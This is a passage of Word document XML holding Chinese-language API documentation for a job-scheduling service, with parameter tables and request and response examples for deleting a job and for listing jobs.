          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>cronEnable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="336B530C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375DC7A8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">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b568b67657c1b743cf33b"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>updatedTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"2019-07-03 11:04:41"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C138C5"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484"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1004"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="7FFF0A2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6ABB502" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="444BE697" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2EDA1908" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="0BF2FD2A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7634F6CB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68ECC35A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E0F4C67" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>作业id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="578B664A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="03E6DD66" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>updatedTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AC83AD1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E853691" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>更新时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="19E00A6A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="389" w:name="_Toc115166267"/>
      <w:bookmarkStart w:id="390" w:name="删除作业"/>
      <w:bookmarkEnd w:id="388"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>删除作业</w:t>
      </w:r>
      <w:bookmarkEnd w:id="389"/>
    </w:p>
    <w:p w14:paraId="42FC3CB4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B1A812" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>DELETE /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fastjob</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/job/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jobId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77899CD8"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702"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="840"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="4241D35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552F04B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09D967C2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="746E305A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1096BFCB" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7255D179" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jobId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61520E7C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24028AE2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>作业id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0248915D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34FD3C42" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fastjob</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/job/5d1b568b67657c1b743cf33b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FD6E8B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2286AEAD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>executeTime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t>"2019-07-03 11:46:21"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t>"flag"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E7F725"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415"/>
        <w:gridCol w:w="1009"/>
        <w:gridCol w:w="1397"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="4AE6291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501072F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="637D4727" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="581F7C08" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5E7DA1F1" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AC2CCDD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>executeTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E3A2A01" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="386A3B9C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>执行时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="708A6F60" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="14BA8554" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>flag</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="529994C6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>boolean</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="68ED3EAD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否执行成功</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="09DFB1BC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="391" w:name="_Toc115166268"/>
      <w:bookmarkStart w:id="392" w:name="获取作业列表"/>
      <w:bookmarkEnd w:id="390"/>
      <w:r>
        <w:t>获取作业列表</w:t>
      </w:r>
      <w:bookmarkEnd w:id="391"/>
    </w:p>
    <w:p w14:paraId="65B23683" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E228CB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fastjob</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>job</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7F43A81E"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969"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="6568"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="405D8ED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19585D4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="403BEFDB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="566D763B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="455664A2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="603D02E0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>osType</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FA43D7E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7AD7D6BF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1439DCDE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1E5F6F73" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>jobName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E434506" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="05BBE481" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>作业名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="77FE164E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0ADAE660" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>updateTimeRange</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AC4AD6C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Map</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="363DB2B8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>更新时间范围, 例如{min: "2019-06-21 16:39:59", max: "2019-06-28 16:39:59"}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3467719E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69AAA9E4" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cronEnables</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53447DE6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List&lt;Boolean&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="059EB3E1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否开启定时</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7F7E7AAF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>排序字段：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1753"/>
        <w:gridCol w:w="1397"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="5D18D38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23585EF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4A5FED20" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2B4EF4E7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C776890" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>updatedTime</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2BF32E96" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>更新时间</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="3F983D45" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F16158B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
